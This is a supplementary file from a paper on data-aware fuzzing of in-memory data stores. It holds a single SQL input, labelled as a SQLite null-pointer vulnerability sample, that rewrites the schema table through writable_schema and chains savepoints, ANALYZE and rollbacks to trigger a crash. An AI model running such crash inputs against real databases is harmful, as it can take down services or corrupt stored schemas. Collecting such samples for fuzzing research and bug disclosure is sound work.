# Supplementary material for: DAFuzz: data-aware fuzzing of in-memory data stores
Source: PeerJ Comput Sci. 2023 Sep 19;9:e1592. doi: 10.7717/peerj-cs.1592 (PMC10557509; doi:10.7717/peerj-cs.1592)
Supplement: Supplemental Information 2 [file peerj-cs-09-1592-s002.zip › DAFuzz/docs/vuln_samples/sqlite-null-ptr14.sql]

CREATE VIRTUAL TABLE x USING fts4();VALUES(0,0),(0,0),(0,0),(0,0);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql=''WHERE name='';UPDATE sqlite_master SET sql='CREATE table t(d CHECK(T(#0)';SAVEPOINT K;SAVEPOINT T;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;
